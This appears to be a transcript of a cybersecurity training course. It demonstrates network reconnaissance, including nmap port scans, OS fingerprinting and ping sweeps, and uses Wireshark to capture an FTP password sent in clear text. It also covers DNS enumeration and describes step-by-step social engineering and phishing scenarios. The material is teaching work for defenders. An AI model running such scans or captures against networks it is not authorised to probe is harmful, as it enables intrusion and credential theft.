used to basically resolve IP addresses to hardware MAC addresses on a local area network. So it can be used to
discover other active devices by looking at the ARP cache on each and every device. For example, on a
Windows machine at the command prompt, I could type "arp -a" to list all ARP cache entries. What we're
seeing here are our different interfaces – so I've got three interfaces listed here. I can see the IP address for the
interface, I can see the IP addresses stored in the ARP cache in memory on this device, as well as the
corresponding physical MAC addresses.
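The Linux side looks much the same. Here's a quick sketch of viewing the neighbor cache on both platforms:

# Windows: list all ARP cache entries for every interface
arp -a
# Linux: show the neighbor (ARP) cache, with IP-to-MAC mappings and entry state
ip neigh show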
Now, for a malicious user to do something terrible on a network, we said that part of what they have to do is
learn about what's there. And this is yet another way that an attacker could learn about things like IP addresses
and MAC addresses. Essentially, the more an attacker knows about our network and what things are called,
what their addresses are, what they are running, what ports things are listening on, the more well equipped they
are to start looking for vulnerabilities. Of course, attackers can conduct network scans if they can get on the
network in the first place. They could scan for open ports to get a sense of what types of network services are
out there. So, for example, if they get a response on a number of devices for TCP port 80, they know that those
are web servers. So they might then focus their energies on those devices to see what type of web servers and
if there are any known vulnerabilities and what version of the web server they are running and so on. Ping
sweeps can also be conducted to see what kind of a response we get on the network, so we know which
devices are out there. And, in some cases when you do a network scan, you might have to specify credentials.
Now this would be done by the good guys. If you are doing some kind of an audit or penetration test or if you
are just conducting a network scan of your own network, you might put in credentials that will allow you to
authenticate to devices on the network and see what's running. Otherwise, the bad guys – essentially malicious users is really what we mean – would be running noncredentialed scans. How hardened your user accounts and passwords are will determine how successful they are with a noncredentialed network
scan. We'll be conducting network scans in various ways in different demonstrations in this class. You might
also have a file that already contains network topology and device information that you can import – so you could see a network layout; it might be in CSV or XML format. Now this is great for the owners of the
network. But, if it falls into the wrong hands, it's a problem. Service discovery can be manual, where clients
are statically configured to discover various network servers, but the way things go these days is we normally
have a centralized service location server.
In this case, DNS could serve that role where we've got service location records that contain hostname
information and port information. This is actually what gets used by Windows devices to find Active Directory
domain controllers. There are centralized service registries where network services add themselves when they
initialize, and clients can discover services by querying this centralized service registry. And, again, this is how DNS service location records are really used. A directory service, like Active Directory, can serve as a
service registry. So it's important that we secure this since it could be a central repository of services available
on the entire network. The last thing we'll mention here is operating system or OS fingerprinting. This allows
us to identify a remote operating system running on a device elsewhere over the network.
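Coming back to service location records for a moment, here is a hedged sketch of the kind of SRV lookup a Windows client performs to find a domain controller; the domain name is hypothetical:

# query DNS for the LDAP service location records advertised by Active Directory
nslookup -type=SRV _ldap._tcp.dc._msdcs.corp.example.com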
Now one way OS fingerprinting can be done is by analyzing network packets sent from a particular OS – each OS has its
own way of formulating certain types of packets. They put certain values in certain packet header fields. For
example, the TTL, or Time to Live field, is part of an IP packet header. In practice, it's a hop count – the number of routers a packet can pass through before it gets discarded. Now there are different default TTLs for different operating systems. For example, a Juniper device would typically set a TTL of 64 on ICMP traffic. The Windows 7 operating system would set the TTL, the time to live, to 128 – that would be the number of routers the packet can go through before it gets discarded; it gets decremented by one for each router it goes through. Older Linux kernels, like 2.4, would set the TTL on ICMP traffic to 255. [A Mac OS X system would use a TTL of 64 for TCP.] In this video, we discussed topology, service discovery, and OS fingerprinting.
Find out how to use logs to learn about the network environment.
Objectives
[Topic title: Reviewing Logs. The presenter is Dan Lachance.] In this video, I'll talk about the importance of
reviewing logs. Logs provide a wealth of information for IT technicians, especially for troubleshooting. But, at
the same time, logs can also provide a wealth of information for curious or malicious users. There are different
types of logs. The first is operating system logs, which will log both good events as well as warning or critical
types of events and, again, crucial for troubleshooting. In the same way, we can have application-specific logs.
We can have auditing logs to track activity for either regular users opening sensitive files or perhaps for other
administrators creating user accounts. Of course, there are also firewall logs where we can track activity or
sessions or even individual packets coming in through the firewall or those that were dropped because they
don't match a firewall rule that allows the traffic.
Individual log entries include many different things including date and time; the host related to that event,
which could be either an IP address or a hostname or perhaps both as well as username information if
applicable; an event ID, which is normally a numeric value that specifically ties to that type of event, so if it
occurs again, it gets the same event ID; and also of course, some kind of an event description. When it comes
to edge devices – and what we're really talking about here are things like VPN appliances, wireless access points, routers, [Network switches] and so on – their logs should be kept separate. In
other words, those edge devices should forward those logs to a different secured host on some other secured
network because if the device is compromised, so are the logs.
Now, at the same time, this is separate from edge devices forwarding authentication requests to a central
RADIUS server. We're talking about log information being stored elsewhere. Now edge devices should not be
storing logs locally. Or, if they do, there should be another copy elsewhere. But they should also not be
performing authentication locally. And that's where the whole forwarding authentication requests to
centralized RADIUS server is very much a big deal. There is a high probability of edge device compromise.
And this is why we want to make sure logs and authentication are handled elsewhere because these edge
devices – not always, but in many cases – are public facing. They are reachable from the Internet.
In Linux and UNIX operating systems, we can use the older syslog daemon or the newer syslog-ng daemon, where ng stands for next-generation. The purpose of this daemon, or this network service, is to deal with logging either
on the local UNIX or Linux host, but it can also send or forward specific log entries that you filter out to
another location as well. It can also receive log entries from other syslog or syslog-ng daemons. So we can specify the log sources – where the log entries are coming from – and the specific types of events that we want to send elsewhere. Windows can do the same thing. We can build event subscriptions and then filter the events
that should be forwarded to other hosts. And it makes a lot of sense in a large network.
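As a hedged sketch of that kind of forwarding using the classic syslog configuration file – the collector address is hypothetical, and exact syntax varies between syslogd, rsyslog, and syslog-ng:

# /etc/syslog.conf or /etc/rsyslog.conf – send authentication-related entries to a central collector
# a single @ forwards over UDP port 514; rsyslog also supports @@ for TCP
authpriv.*    @10.0.0.50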
Even if you're just dealing with desktop computers or Windows servers or Linux servers, instead of having to
review the logs on each and every device, it's nice to have a centralized location where
you have all the log entries that would be of relevance – for example, maybe only error or critical or warning
log entries on one host. And maybe, as you sip your morning coffee, that's where you go to check the latest log
entries. Here in Linux, [The following terminal window is open: root@Localhost:/var/log.] if we take a look at
the current working directory with pwd [Dan executes the following command: pwd. The following output is
displayed: /var/log.] – print working directory – we can see we're looking at /var/log. This is where most
Linux distributions store various types of log files. If I type ls to list the contents, I can see both files listed here
in black text as well as folders containing logs for certain items like cups – the Common UNIX Printing
System – and so on. So, for example, if I use the cat command to display the contents of the secure
log, [He executes the following command: cat secure.] I see information related to authentication and
passwords that succeeded and so on. At the same time, if I were to clear the screen and then use cat against the
main Linux system log messages, [He executes the following command: cat messages.] I can see all of the
details related to the main operating system kernel that's been running and the messages that it reports. And, of
course, if I really want to, then I can go ahead and filter that log. So for example, I can type cat messages and I
can pipe that using vertical bar symbol, let's say, to grep and maybe we will do a case insensitive line matching
for vmware. [He executes the following command: cat messages | grep -i vmware.] And here I can see
VMware-specific related items in that log file.
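A couple of related one-liners in the same spirit – again just a sketch, since log file names vary by distribution:

# follow the main system log as new entries arrive
tail -f /var/log/messages
# show failed authentication attempts recorded in the secure log
grep -i "failed password" /var/log/secure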
Here, in Windows Server 2012 R2, we can fire up the Event Viewer. [The Event Viewer window is open. It is
divided into three sections. The first section is a navigation pane. In which Event Viewer (Local) node is
selected by default. It includes folders such as Custom Views and Windows Logs. The second section displays
the information on the basis of the selection made in the first section. The second section includes the
following subsections: Overview, Summary of Administrative Events, Recently Viewed Nodes, and Log
Summary. The third section is titled Actions which includes the Event Viewer (Local) expandable node.] And
from here, for instance, in the left navigator, I might expand Windows Logs and look at the main System log
file [In the navigation pane, he clicks the Windows Logs folder. On clicking it, several options appear, he
clicks the System option.] with all of its entries. So, once they pop up over here on the right, I'm going to see a
series of columns that I could also sort by. Maybe I want to sort my log entries chronologically or by the
Source or by the Event ID. [On selecting the System option, its content gets displayed in the second section.
The second section displays the number of events in a tabular format. The following are the column headers:
Level, Date and Time, Source, Event ID, and Task Category. On selecting any entry from the table, its
information gets displayed below the table. There are two tabs below the table: General and Details.] So, for
example, maybe what I'll do here is sort by the Level column. So all my informational messages are listed at
the top. If I click it again, it sorts in the opposite order. And I could see all of my critical and warning items listed
at the top. We'll just scroll back up here and so on. So, as we scroll through the log, we can see the types of
information listed here. If I select on a specific log entry, so I will just double-click on it, it pops up the details
– shows me when it was logged, [He double-clicks an entry in the table. As a result, the following dialog box
opens: Event Properties - Event 7036, Service Control Manager.] the Event ID number, which I could search
for online, and so on.
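For scripted review, the same logs can be queried from the command line with the built-in wevtutil tool; a hedged sketch:

# show the 20 most recent System log entries, newest first, as readable text
wevtutil qe System /c:20 /rd:true /f:text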
Now, from a security perspective, [He closes the dialog box.] yes, all logs are important. But we might also be
especially interested in the Security log here [In the navigation pane, under the Windows Logs folder, he clicks
the Security option.] in Windows, where audit events appear. If we are auditing logon attempts – whether they fail or succeed – or file access, we're going to see entries listed here for auditing. [He refers to the number of
auditing events which are displayed in the tabular format in the second section.] Of course, at the same time,
we can right-click on a log in the left-hand navigator and we could Filter Current Log. [In the navigation pane,
he right-clicks the Security option. As a result, a shortcut menu appears from which options can be selected.
He selects the Filter Current Log option.] So we could say, for instance, "I only want to see Critical errors. I
only want to look at certain Event sources or certain Event IDs". [The Filter Current Log dialog box opens. It
contains two tabs: Filter and XML. Under the Filter tab, there are several fields such as Logged, Event Level,
and Task Category.] So, for example, I might look for Critical, Warning, or Error items here in the Security log, and
I'll just click OK. [In the Event level field, he checks the following checkboxes: Critical, Error, and Warning.
Then he clicks the OK button.] And, after a moment or two, it will filter it out. And any log entries that do
meet those conditions will be listed. So, of course, I could choose something here. [In the second section, for
the Security option, the Number of events are displayed in a tabular format after applying the Critical, Error,
and Warning levels.] And I could see the details by double-clicking and reading that log entry.
Now, if I really wanted to configure log forwarding – in this case, in Windows – that's where I would go to my
event Subscriptions [In the navigation pane, he selects the Subscriptions folder. As a result, the Event Viewer
pop-up box appears in the second section.] where it tells me to start the Event Collector Service. And then,
from there, I could right-click and Create Subscription where we would do things [In the navigation pane, he
right-clicks the Subscriptions folder. As a result, a shortcut menu appears from which options can be selected.
He selects the Create Subscriptions option. Then, the Subscription Properties dialog box opens which includes
fields such as Subscription name, Description, and a drop-down list box named Destination log. It also
contains the following section: Subscription type and source computers. It contains the following radio
buttons: Collector initiated which is selected by default, and Source computer initiated. There is the Select
Computers button adjacent to the Collector initiated radio button.] like Select Computers I want to reach out
to and grab log information from. And then, of course, I could filter the events down here in the bottom right by
clicking Select Events. [He clicks the Select Events drop-down list box.]
Now, when I do that, I get to choose the event types [The Query Filter dialog box opens. It contains the Filter
and XML tabs. The Filter tab is selected by default. Under the Filter tab, there are several fields such as Event
level, Event logs, and Event sources.] – Critical, Warning, Error, Information, and so on. And I could further
filter it by event log types – maybe only certain logs I'm interested in – Event IDs, Keywords, and so on.
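Behind the scenes, a couple of built-in commands get that forwarding working; a hedged sketch, run on the collector and on each source computer respectively:

# on the collector: configure the Windows Event Collector service
wecutil qc
# on each source computer: enable remote management so the collector can subscribe to its events
winrm quickconfig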
The last logging item to consider is log rotation so that as log files become full, new logs get created while we
retain a history of the older logs. So we can have different log rotation settings that apply to individual logs.
We can do it in Windows, we can do it in Linux and UNIX. Then there is log retention, which might be
required for regulatory compliance, but we also have to think about how much disk space will be used by
archived logs. This might be a case where we actually choose to archive something long term in the cloud. In
this video, we discussed how to review logs.
[Topic title: Packet Capturing. The presenter is Dan Lachance.] In this video, I'll talk about packet capturing.
Packet capturing can be used by either legitimate users or malicious users for a variety of reasons, including
the establishment of a network traffic baseline. So, by capturing a large enough amount of traffic, we can
establish what is normal in terms of network traffic patterns. We can also capture traffic and then use it to
troubleshoot network performance issues, such as if we have a jabbering network card that is sending out
excessive traffic or if we are getting a lot of network broadcasts that we don't think should be on the network,
we can check out the source. So we use packet capturing then to monitor network traffic. It can record traffic
and save it to a file for later analysis. And, in some cases, some packet capturing tools allow you to replace
contents within fields, within headers of the packet, or in the payload and then send it back out on the network
again. Now, when we're capturing network traffic, we're talking about capturing it whether it's on a wired
network or wireless.
There are numerous packet capturing tools available. Some are hardware-based, where we can use rule-based traffic classification, send packets to a different interface, or drop packets that we aren't interested in. Now that could also be useful for mitigating things like denial-of-service
attacks. It might not be just that you are not interested in capturing or recording that traffic, but it's suspicious.
And you don't want to have any part of it. At the software level, there are numerous applications out there to
capture network traffic and to perform analysis. Wireshark is one. In UNIX and Linux environments, we can
also use the tcpdump command.
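For instance, a hedged tcpdump sketch – the interface name will differ from system to system:

# capture HTTP traffic on interface eth0 and write it to a file for later analysis in Wireshark
tcpdump -i eth0 -w web-traffic.pcap 'tcp port 80'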
Here in Wireshark, [The Wireshark Network Analyzer window opens. Running along the top of the window is
a menu bar. Below this, there is a toolbar.] if I click the leftmost icon in the toolbar, [The Wireshark: Capture
Interfaces window opens. A list of interfaces appears. Each interface has the following buttons adjacent to it:
Start, Options, and Details.] I can choose from the list of interfaces which one I want to capture network
traffic on. So I see, in my second interface here, I've got a number of packets going through that interface.
That's the one I want to capture traffic on. So I'll just go ahead [Dan refers to Microsoft interface which has
the following IP: 192.168.1.157. It contains 108 packets.] and click Start. And, when I do that, it starts
capturing the network traffic. I can see the Source where it came from, the Destination where the traffic is
going to, the Protocol, and additional Info.
Now, when I am happy with that, I can go ahead and I'll click the fourth button from the left in the toolbar to
stop the capture. And, as we stated, we could Save this for later analysis. [He clicks the Save option from the
File menu in the menu bar.] Now, if I select an individual packet in this listing, in the middle of the screen, I
can see the hardware frame – in this case, Ethernet II – where I can see the Source and Destination hardware or
MAC addresses that's Layer 2. Then I can see the IP header, the Internet Protocol header, where I see things
like the Time to live – the TTL. And, as I scroll further down, the Source and Destination IP addresses – those
are Layer 3 addresses.
Now let me just collapse the IP header. Then I see that this is a UDP transmission – User Datagram Protocol.
And again, I can see here the Source port and the Destination port. So again, that's Layer 4. And then I see
Data. Now the Data is the payload – the actual contents of the packet. Everything else that we've just looked at is used to get the packet to where it's going and back. So, in the data, we have the payload. Essentially that
would map, generally speaking, to Layers 5, 6, and 7 in the OSI model depending exactly on what's happening.
So our frame here where we see our MAC addresses – Layer 2; the IP header – Layer 3; the UDP header –
Layer 4; and the payload or data in the packet – Layers 5, 6, and 7 of the OSI model.
So, when you are capturing network traffic, we have to understand the distinction between hubs versus
switches. Because, in the hub environment, all the devices plugged into the hub can see all of the traffic
transmitted by all other devices plugged into that hub. Now, with an Ethernet switch, it's different. Two
communicating devices can see their own unicast transmissions to each other, but they don't see other unicast
transmissions for other stations on the same switch. They'll see broadcasts and multicasts, but that's about it.
So, if you're using a network switch, which pretty much everybody would be, then you have to think carefully
about which physical port your device is plugged into if you want to capture network traffic because if your
switch supports it, you want to make sure you configure port mirroring so network traffic on other ports is copied to the one where you are capturing. Otherwise, when you capture network traffic, you might only be seeing traffic related to your own station, again, other than broadcasts and
multicasts. So the switch monitoring port then is very important.
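On many Cisco IOS switches, that mirroring (SPAN) configuration looks roughly like the following sketch; the interface names are hypothetical:

! copy traffic seen on the monitored port to the port where the capture station is plugged in
monitor session 1 source interface GigabitEthernet0/1
monitor session 1 destination interface GigabitEthernet0/24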
We should also consider the fact that if we are interested in capturing traffic going through a router, then
maybe that's where we would run our packet capturing tool. A multihomed device is one that's got at least two
network interfaces. So, if we've got a server acting as some kind of a firewall, then we might run our packet
capturing software there to capture traffic entering or leaving the network, same as a router. We have to watch
out for ARP cache poisoning. This is where a malicious user can update the MAC address in client ARP cache
tables in memory with a rogue MAC address – in other words, with their MAC address for their fake router.
Now that can be used for good to redirect people through a more efficient router or for evil where a malicious
user is really only interested in getting all the traffic funneled to one location so they can capture it all even in a
switched environment.
When you capture network traffic, you can configure a capture filter so that you are filtering what you are
capturing in the first place or you could capture everything that your machine can see on the network and then
you can configure a display filter to filter out what you are looking at. So for example, if you only want to see
SMTP mail traffic from a certain server, you can easily do that. So for example, here we see in our first
statement, we are filtering by an IP source address. [ip.src == 10.43.54.65] The second example here – we
can filter by a TCP port number equal to 25, which would be SMTP or we might look for ICMP
traffic. [tcp.port eq 25 or icmp] In the third example, we're taking a look at the first three bytes of a hardware MAC address to ensure they match what's been filtered for here. [eth.addr[0:3] == 00:06:5B] Now these are display filter statements that we might use in a tool such as
Wireshark. In this video, we discussed packet capturing.
[Topic title: Capture FTP and HTTP Traffic. The presenter is Dan Lachance.] One of the many tools available
for reconnaissance is a network analyzer, otherwise called a packet sniffer. Here, in my screen, I've
downloaded and installed and started the free Wireshark application. [The Wireshark Network Analyzer
window opens. Running along the top of the window is a menu bar. Below this, there is a toolbar.] Now, to
start a capture, I'm going to click the leftmost icon in the toolbar, which lists my interfaces on this machine.
The second of which has some packet activity. So I'm going to start capturing on that by clicking the Start
button. Now I'm going to remove any filtering information to make sure that we are capturing all network
traffic. I'm then going to connect to a web server at 192.168.1.162. [Dan enters the following in the address
bar of the web browser: 192.168.1.162. Then the Windows Server web page opens. It displays the Internet
Information Services section.] And, after a moment, we can see the web page pops up. And, in another web
browser tab, I'm going to use the ftp:// prefix in the address bar to connect to an FTP server running on that
same host.
Now the FTP server here requires authentication. [The Authentication Required dialog box opens. Dan enters
his login credentials.] So I'm going to go ahead and provide the credentials. And then it logs me in. And I can
see the index listing of files at the root of the FTP server. There are none because it's an empty FTP server, but
it did let us in. Let's go back and stop the Wireshark capture. And then let's take a look at both the HTTP and
the FTP traffic that we just captured. Here in Wireshark, I'm going to click the fourth icon from the left to stop
the packet capture. And I'm going to go ahead in the Filter line up there and type http. [In the Wireshark
window, below the toolbar, there is Filter search bar. He enters http in the Filter search bar.] So we only are
viewing HTTP packets. Now here I see a number of packets. Each line here is a packet.
When you select it in the middle of the screen, you can see the packet headers. [The window is divided into
three sections. The first section lists the number of packets in a tabular format with following column headers:
Time, Source, Destination, Protocol, and Info. The second section displays the packet headers. The third
section displays the hexadecimal and the ASCII representation of the packets.] And, at the very bottom in the
third panel, you can see – on the left – a hexadecimal representation of the content or payload of the packet and, on the right, an ASCII representation. But what we could do is modify our Filter. Let's
say we're going to add ip.dst==192.168.1.162, which we know is the IP address of our web server. [He enters
the following in the Filter search bar: http and ip.dst==192.168.1.162.] And here we happen to have one
captured transmission. And let's take a look at the headers – so having that packet selected. It's an HTTP
packet. We can see that in the Protocol column. In the Source column, we can see where it came from. That's
my local client address. And the Destination – in this case, the web server.
So the Ethernet II frame has Layer 2 addresses – in other words, MAC addresses. If we take a look at the
Internet Protocol or IP header, it's got a number of fields, but it does include the Source and Destination or
Layer 3 IP addresses. The Layer 4 header is the Transmission Control Protocol, TCP header, where we've got a
Source port. In this case, because this transmission is coming from a client, it's a higher-numbered port, but it's destined for port 80 because it is going to the web server. And finally of course, we are going to see some
more detail, in this case, for the Hypertext Transfer Protocol, which – depending on how you are connecting
and whether or not it's encrypted – would map to Layers 5, 6, and 7 of the OSI model. So we can see down
below here...in the ASCII representation of the payload, we can see that we're using a Chrome browser. And
we can see that it's just basically requesting some icon files and so on from the web server.
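Incidentally, the same kind of filtering can be scripted with tshark, Wireshark's command-line counterpart; a hedged sketch against a previously saved capture file:

# read a saved capture and show only HTTP packets destined for the web server
tshark -r capture.pcap -Y "http && ip.dst == 192.168.1.162"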
Let's go up in the Filter line and type in ftp and examine that traffic. [He enters ftp in the Filter search bar.] So
I'm going to go ahead and press Enter. And, after a moment, it will filter it for FTP. We can see there is a
communication between the FTP server, which is also the web server's IP address, with my local station. [He
refers to the IP address 192.168.1.162 which is present under the Source column and to the IP address
192.168.1.157 which is present under the Destination column.] And, having an FTP packet selected, if we
kind of break down the headers like we did with HTTP, you'll find it's pretty similar. So we've got our Ethernet
frame with the Source and Destination MAC addresses. Again, that applies to Layer 2 of the OSI model. The
IP header – that's Layer 3 – has various fields including the Time to live or TTL, which will vary from one
operating system to another.
Here with Windows, it starts at 128. And it gets decremented by one as it goes through each router along its
path. But we can also see in the IP header the Source and Destination IP address yet again. Just like we did
with HTTP and just like with HTTP again, we've got a Layer 4 TCP header – Transmission Control Protocol.
Of course, the port information is going to be different for FTP than it will be for a web server. And finally,
we've got the actual application header for the File Transfer Protocol (FTP) here, which again, depending on how it's used, maps to Layers 5, 6, and 7 of the OSI model. So we can see any information related to
that.
Now what's interesting is even without delving down into the payload of the packet, just by looking at the
Info column up here in Wireshark on the right, I can see that it prompted me for a username – which was
specified as administrator – it then asked for a password. And the password is in clear text here. There is no
challenge. If anyone can be on the network capturing traffic while you're using a clear-text credential passing system like FTP, it's child's play to retrieve that information. Now, to protect FTP communications, you might use IPsec (IP Security). Everything would be encrypted, FTP or not. You might use a VPN tunnel through
which you do FTP traffic.
That would be safe. Or maybe you use a secure FTP solution, perhaps, using FTP over an SSH connection. But
FTP by itself is not considered safe. Now you can apply the kind of approach that we've talked about in this demonstration to capturing pretty much any type of network traffic and begin interpreting what you're looking at. It's one thing to capture the traffic; the skill comes in being able to interpret what you are seeing. And, to do that, you've got to understand the OSI model and the TCP/IP protocol suite, MAC addresses, IP addresses,
and so on. In this video, we learned how to capture and analyze FTP and HTTP traffic.
[Topic title: Network Infrastructure Discovery. The presenter is Dan Lachance.] In this video, I'll demonstrate
how to perform network discovery using Linux. Now there are plenty of tools for both Windows and Linux.
Some are command line based. We will be using the nmap command in Linux. But, in both Windows and
Linux, there are also graphical tools that can map your network for you. Some are free, some are not. [The
root@kali:~ window is open.] So let's start here in Linux by typing nmap. And then I'm going to pop in the IP
address of a specific host on the network. Now, given I am putting this host address in, it means I must already
know what exists and that it's up and running. But we will talk about what to do when you don't know that
already. So, when I press Enter, [Dan executes the following command: nmap 192.168.1.200.] what nmap is
going to do is start to show me, well first of all, whether or not that host is up and running. And we know that
host is up and running because it's showing us open ports on that host. Now here we see a number of TCP
ports that are open. And, if we take a look, we'll see ports 135/tcp, 139/tcp, 443/tcp, 445/tcp, 3389/tcp, which
is for remote desktop. This smells like a Windows machine, specifically a domain controller.
Now we can't be sure without further investigation, but that's what reconnaissance is about. It's about scanning
one or more hosts – in this case, an entire network or multiple networks – as a starting point, which serves as a
launchpad for further investigation for things that look interesting. Now this could be used legitimately so we
can identify any weaknesses on our network. Or it could be used by malicious users to pinpoint what they are
going to exploit or attempt to exploit. Let's clear the screen with a clear command. And let's run nmap again,
except this time I'm going to use the -O option, which allows me to do OS fingerprinting. And again, I'm
going to give it a single-host IP address. So I'm going to go ahead and press Enter. [He executes the following
command: nmap -O 192.168.1.200.] Now this may take a moment or two, but the idea is that it's going to take
a look at open ports and also at the type of responses it gets in terms of packets to try to guess at what type of
OS it is. And notice down below, it's telling me that it's probably Windows 7, Server 2012, or Windows 8.1. In
fact, that machine is running Windows Server 2012 R2.
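If we also wanted to know exactly what is listening behind those open ports, a reasonable next step – sketched here against the same demo host – is service and version detection:

# probe open ports to identify the service and version running on each
nmap -sV 192.168.1.200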
So again, this is part of reconnaissance. It is not only seeing what nodes are up on the network or what ports
are open, which services are running, but also what operating systems are running. It is all about information.
It really is power when it comes to gathering information. And that's really the first thing that happens when an
attacker starts doing their homework when they have chosen a victim. And, maybe in some cases, it helps them
choose a victim. Often, attackers will go for the lowest hanging fruit, it happens. So the next thing I'm going to
do is I'm going to clear the screen and then I'm going to run nmap. I'm going to do a ping sweep so I can see
which hosts are up and running on the network. To do that, I will use -sP. And then I'm going to tell it 192.168.1.0 – that's my network address – /24. That's the number of bits in the subnet mask expressed in CIDR format. So basically, it's a ping sweep. [He executes the following command: nmap -sP 192.168.1.0/24.] And what we want is for each host to respond with an ICMP Echo Reply.
Now, of course, if hosts are fully firewalled, then this is going to be an issue. We're not going to get much
back. But what I'm starting to see is a list of hosts that are up and running. I am seeing some details about
whether it's a VMware device or so on. And I'm also able to see the MAC address. So, down at the bottom, it
says nmap is done, 256 IP addresses. And, out of that, 11 hosts are up and running. Again, we know now
what's active on the network. And, from here, we might pick on some of them and do OS fingerprinting or get
a list of ports that are open on those devices. In this video, we learned how to perform network discovery in
Linux.
After completing this video, you will be able to explain harvesting techniques.
Objectives
[Topic title: E-mail and DNS Harvesting. The presenter is Dan Lachance.] In this video, I'll talk about email
and DNS harvesting. Both email and DNS harvesting are forms of reconnaissance. They can be either
manually invoked by perpetrators or automated – which is usually the case – through bots, some kind of automated software that can often be delivered through malware. Email and DNS harvesting is
illegal in some jurisdictions around the world. Because what we're doing is gathering sensitive information and
potentially using it in a way that the owner of that information did not consent to. Email harvesting is the
process of obtaining email addresses from websites and various network services, such as an LDAP server that might serve as a centralized contact list, from public forums that might list email addresses, like social media sites, and also from malware that can read infected users' contact lists. Now why would someone want to harvest
email addresses? Well, it could be used for bulk email lists to try to send unsolicited spam messages or trying
to sell a service or a product of some kind. That's one way it can be used.
Another is for phishing, spelled with a PH prefix, where we essentially get lots of people's email addresses and send out some kind of a scam email, maybe with a file attachment, and trick the user into opening the attachment, which then infects their machine. Or maybe the phishing scam is used to trick the user into
clicking a link and providing sensitive information, like banking details. In this example, [The screenshot of an
e-mail message from Western Union Support Team is displayed on the screen.] I've got an email message that
was received about Western Union money transfers, which I never sent. Now, the idea is that this is a scam
where there's a file attachment. And, in the body of the message, I'm being instructed to detach the Western
Union file attachment so that I can reclaim the funds that I sent. When, in fact, I never did. So, it's always a
good idea to be somewhat suspicious and cynical when you get email messages that your gut instinct tells you
don't feel right. Because this is probably an email message that would infect my machine. Many websites these
days don't post email addresses and this is a good thing. Instead, if we need to send an email to someone
related to the website, we would fill in a form. And then that form is sent to the server where there's a server-
side script that sends the email.
So, the email address then is never exposed to the client web browser. DNS harvesting is the process of
obtaining DNS records. DNS is a name lookup service where we normally do a query against the server, giving it a name, such as www.google.com. And it returns the IP address. Well, private DNS servers hold names and IP addresses which could reveal a lot about the internal network structure of a company. A zone transfer is the transfer of records between different DNS servers. Now, in some cases, that can be captured with network capturing tools. At the same time, there are command line tools built into operating systems, like the old nslookup – the name server lookup command – which can be used to query DNS or to request a zone transfer. Now that's not to say nslookup is a tool that's only used for bad purposes. It can also be used for troubleshooting or just to test that DNS is functioning correctly. So, for example, here at the Windows
command line. [The Command Prompt window is open.] I can type nslookup to start the nslookup tool in
interactive mode, where the prompt changes. [Dan executes the following command: nslookup. The following
output is displayed: Default Server: google-public-dns-a.google.com, Address: 8.8.8.8.] And if I wanted to, I
could simply type in something I want to query, like www.google.com and it will return the IP addresses for
that web server. Of course, what I could do is change the type of record I'm querying. For instance, I might
type set type=mx. That's a mail exchanger record. And then I might type whitehouse.gov. So I want to see
SMTP mail hosts related to email addresses at whitehouse.gov. And of course, I can see I have numerous
listings for hosts listed down below. The good news is that DNS servers can be configured to limit zone
transfers to specific hosts. Also, firewalls can block DNS queries, even from specific sources, because we know that DNS queries from clients come in on UDP port 53, while zone transfers between DNS servers normally occur over TCP port 53. Now DNS harvesting is also often referred to as DNS enumeration, because that's really what it's doing. In this video, we discussed email and DNS harvesting.
After completing this video, you will be able to recognize social engineering techniques.
Objectives
[Topic title: Social Engineering and Phishing. The presenter is Dan Lachance.] In this video, we'll discuss
social engineering and phishing. Social engineering is yet another form of reconnaissance as is phishing spelt
with a "ph" instead of an "f". And we're not talking about the relaxing type of phishing here. Social
engineering is really the equivalent of deceiving people. It's trickery. Phishing is a form of social engineering.
Now the goal of social engineering and phishing is to have victims divulge sensitive information. You're trying
to fool people to do that. So that sensitive information would include things like usernames, passwords, bank
account information, and so on. So the victim then believes in the legitimacy of the perpetrator. Perpetrators
then exploit people's fears often. So there might be some kind of a social engineering or phishing scam where
we pretend to be law enforcement tracking Internet activity. And so there is a pop-up that might display on the
user's screen. And, because people are afraid of imprisonment, if there is a message that says to send money to
a certain PO box or through Western Union Money Transfer, they may actually pay up – it happens. Another way that perpetrators can exploit people's fears is the tax man.
So there might be an e-mail phishing scam whereby we claim to be the government and that income taxes are
past due. And that to avoid penalties and higher interest charges on the outstanding balance, people need to pay
immediately using their credit card or by sending a money transfer. Again, playing on people's fears. So here is
an example of social engineering. We are in step one. A malicious user calls an unsuspecting victim, claiming
to be a telephone company technician that needs to come on-site to fix a problem. Now, of course, the
malicious user will have done their homework. They will have performed reconnaissance so they know who
the telephony provider is for this specific victim company they are targeting. And they might get to know the
name of the receptionist, know what kind of telephony services the company uses, and so on. Number two –
the victim would then set the appointment date and time. They would probably have no reason to believe that it
was a scam if things were done properly by the malicious user.
In step three – the malicious user shows up, dressed in the appropriate clothing, carrying the appropriate tools.
So they look like the real deal. In step four, the victim would then let the malicious user into, in this case, a
wiring closet or a server room to fix the – quote, unquote – problems with the telephone system. Now, in step
five, the malicious user has physical access to network infrastructure gear. That is a problem. In a phishing
example, in step one, a malicious user would send an e-mail message to a harvested e-mail address. Now, of
course, this would be automated, it would be sent to thousands of e-mail addresses that were harvested, in most
cases, probably illegally. The message would appear to come from a reputable bank, for instance, and the
message would ask the user to reset their password and provide a link to a site. And you know, even if the user
follows that link, it looks like their banking site – it looks legitimate. Really, it's a fake web site that looks like
the real thing that's under control of the malicious user. So then, in number two, the victim clicks the link and
enters sensitive banking information which, of course, is captured by the malicious web site.
So the malicious user's web site would then display a message to the user telling them that the bank is
experiencing technical difficulties – so, of course, it can't actually show them their accounts – and that the user
should try again later. Of course, when the user tries again later, it's too late. In this example, I've received an
e-mail message from what appears to be my bank. [The screenshot of an e-mail message is displayed.] But, if
we will look carefully at who it says it's from, at the top of this e-mail message, the e-mail address looks like
it's coming from some kind of an educational institution. And the message is telling me that someone tried to
access my bank account from a device on a certain date, from a certain IP address in Canada, and that it wasn't
successful. And so due to this, the bank has locked my account and everything is frozen, all my funds are
frozen. So to unfreeze them, all you have to do is click this link and then everything will be good.
Now this smells like a phishing scam, and it most certainly is. So, even if this happens to be a bank you actually do
business with, do not click any links. You would need to actually go through the normal channels you would
do to sign in to ensure that nothing is wrong with your account. You know, it doesn't matter what type of
technical security controls you have in place, if people aren't aware of this type of scam, attackers can circumvent
most of your security controls and still wreak havoc on the network by infecting machines or divulging
sensitive information. So user awareness and training is absolutely number one. So what can we do about
social engineering and phishing issues?
Well, technically there are a few mitigating controls – e-mail spam filters, for example, can help – but the administrative mitigation control level is where we really focus: as we've emphasized, user training and awareness. This
might be done through lunch and learns, through documentation, part of orientation for new employee hires,
and so on. We might even have posters in the workplace, something that's creative and fun and interesting that
gets the point across about these potential security problems. In this video, we talked about social engineering
and phishing.
